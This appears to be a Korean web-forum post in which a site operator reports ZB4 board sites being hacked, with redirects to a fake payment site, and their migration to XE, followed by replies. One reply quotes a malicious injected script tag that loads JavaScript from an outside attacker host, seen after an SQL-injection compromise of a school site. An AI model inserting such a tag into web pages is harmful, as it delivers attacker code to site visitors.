사이트 내 전체검색
[추가] ZB4로 현재까지 사이트를 운영하는분들 긴급 상황안내 (???)
로빈아빠
https://cmd.kr/server/769 URL이 복사되었습니다.

본문

8년 가까이 ZB4로 사이트를 몇개 운영해오고 있었는데, 약 2개월전에 그중 하나의 사이트를 해킹 당했습니다.


지금까지 배포된 ZB4 보안패치는 하나도 안빼고 전부 적용했었지요.

그런데도 자꾸만 뚫리더군요.

방법을 찾다가 XE로 마이그레이션하고 완전히 재개발하여 우선 해킹당한 사이트를 복구했습니다.(본글에 소개된 사이트)


그런데, 며칠전 또 다른 사이트 하나가 해커에게 완전 장악을 당해서, 다시금 XE로 마이그레이션 준비중입니다.


사이트 운영이 국내가 아닌 타국에서 현지어로 서비스되고 있는데, 이 문제로 2번이나 해당 국가 사이버테러방지 담당 부문에서 경고를 먹었습니다.

사이트 자체가 장악당한 문제의 손실도 있지만 해당 사이트를 숙주로 만들어 다른 사이트까지 영향을 끼치게 하다보니.....

다시 이런문제가 발생시 영구폐쇄시킬테니 잘하라라는 경고 입니다. ㅠ.ㅠ


아마도 해커들에게 ZB4의 보안결함 문제가 광범위하게 퍼져 있는듯, 물론 상기에 말한 2개의 사이트에 모든 ID와 비번은 서로 상이하게 운영되고 있던 것인데......!

아무튼 아직까지 ZB4로 사이트를 운영하는 분들은 조기에 XE로 갈아타든 또다른 방법으로 리뉴얼을 하든 긴급조치하시기 바랍니다.


P.S : 해킹의 증상

사이트에 접속시 로그인을 안해도 리다이렉션 되어 이상한 금융결제 사이트로 자동으로 넘어갑니다.

해킹된 폴더에는 "Paypal" (금융결제 사이트 잘알지요?) 이라는 폴더를 만들고 무수히 많은 소스 파일들을 올려 놓았더군요.

그외에도 이상한 바이러스 파일도 들어가 있고..... 난리도 아닙니다.


소스와 폴더에 uk라는 단어가 있는 것으로 보아 정확하지는 않지만 영국쪽 해커가 아닐까 추정하고 있습니다.(Log 파일을 분석중)

2009년 11월 21일 긴급 추가한 글


상기글에 언급된 2번째로 해킹당한 사이트 리뉴얼 작업 결과물이 아래아래 그림에 나와 있다.

오랜기간 몇개의 웹사이트를 운영해 오던중오던중 약 2달간의 시차로 2개의 웹사이트가 해킹을 당해서 오랜만에 웹프로그래밍으로 몸풀기(??)를 열심히열심히 하였는바, 두번째로 해킹당한 웹사이트는 작업개시 3일만에 리뉴얼을 완료 하였다.

첫번째 해킹당한 사이트를 리뉴얼할때는 XE를 처음 접했기 때문에 XE라는 빌더툴을빌더툴을 익히느라 예상외로 많은 시간이 필요했지만, 이제는 손쉽게 작업을 할 수 있어서있어서 나름대로 재미가 있다.

< 작업 결과물 스크린샷 - 사이트 내 여러 페이지 중 XE 게시판이 연결된 레이아웃 화면이다 >

이번 작업은 약간약간 정석을 벚어난 방법으로....... 헤더와 좌우 메뉴영역을 먼저 만들고, 게시판이 들어갈 영역(즉,영역(즉, 컨텐츠 영역)에 게시판을 붙여넣는 방법으로 하고, 나머지 Footer 부분을 붙이는 형식을형식을 취해봤다.
물론 레이아웃이라는 XE틀 안에서 이루어 지는 작업이기에 기본적으로는기본적으로는 빈 레이아웃 정도는 준비를 해야 한다.

이제 서버에서버에 업로드만 하면 작업은 완료되는 고로...... 오늘작업은 끄읕~~~~~~~!@

--------------------------

  1. 고생하셨겠습니다.

    해킹을 당하면 얼마나 속상할까하고 생각하게 됩니다.

    네 해킹의 손실이 좀 크네요.
    사이트를 재 개발해야 하는 문제와 개발완료하고 복구되기까지 사이트가 닫히므로인한 방문자 격감에 대한 손실 등등 유무형의 손실이 커집니다.

    일반적인 웹 사이트들은 문제가 없는데, 게시판 형식의 커뮤니티의 경우 게시판용 프로그램을 어쩔수 없이 사용하게 되는데, 뚫리는 원인은 이런 보드류의 프로그램에 보안취약성 때문에 당하게됩니다.

    어제까지 재개발 완료하고 방금전에 사이트 서버에 올려서 재개통 했습니다.
    해당 국가 담당부서에서 계속 겁을 주네요.
    다시 또 문제가 발생시는 사이트 폐쇄와 아울러 아예 도메인네임까지 영구 정지시킬거라며 한껏 겁을 주더군요.

    글서 농담조로, 야 야 너무 겁주지 마라 그러고 말았습니다 ㅠ.ㅠ

  1. 해킹,
    간접적인 경험이 있습니다.
    작년 어느날 지인의 소개로 어느 싸이트에 이상한 바이러스가 계속뜨는데, 한다하는 업체들 네개 업체가 붙어서 해도 근절이 안된다고 하면서 한번 해볼 생각이 있느냐 하기에 돈은 나중에 차후에 받는 조건으로 해보기로 하였습니다.
    시내 모 고등학교 싸이트였는데, 알고보니 말로만 듣던 SQL INJECTION 해킹을 당하고 있었습니다.
    MS-SQL DB 에 스크립트를 심어놓고, 싸이트를 원격콘트롤 하고 있다는 것을 알게 되고 보니 섬뜻하였습니다.
    아마도 학생들, 교직원들 인적사항은 다 넘어갔을 것입니다.
    학교는 발칵 뒤집혔고, 제가 들어서 APM으로 완전히 새로 구축한 그런 경험이 있습니다.
    그때 무수히 깔렸던 스크립트는 (여기 기재해도 될런지 모르겠으나, 만약 문제된다면 지워도 상관은 없습니다.) 아래의 것이 가장 많았습니다.

    <script src=http://s1.cawjb.com/*.js>

    중국의 지방기관 싸이트라는 것만 알게되었는데, 더 이상은 알 수가 없었습니다.

    공부해야될 것이 많은데, 해킹 대비까지 해야되니 힘드네요.
    좋은 글 잘 보았고 감사의 뜻으로 몇줄 남겼습니다.

    무슨일이든 직접 경험을 해본 사람만이 그 실상을 뼈저리게 알게되더군요.

    해킹을 당하지 않는 최선의 방법은....가능하면 보드와 DB를 사용하지 않는 방법인데, 그렇다고 사용하지 않을 방법도 없으니 해킹때문에 웹사이트 운영하는 것이 약간 부담스러운 것도 사실입니다.


댓글목록

등록된 댓글이 없습니다.

1,139 (20/23P)

Search

Copyright © Cmd 명령어 18.117.8.177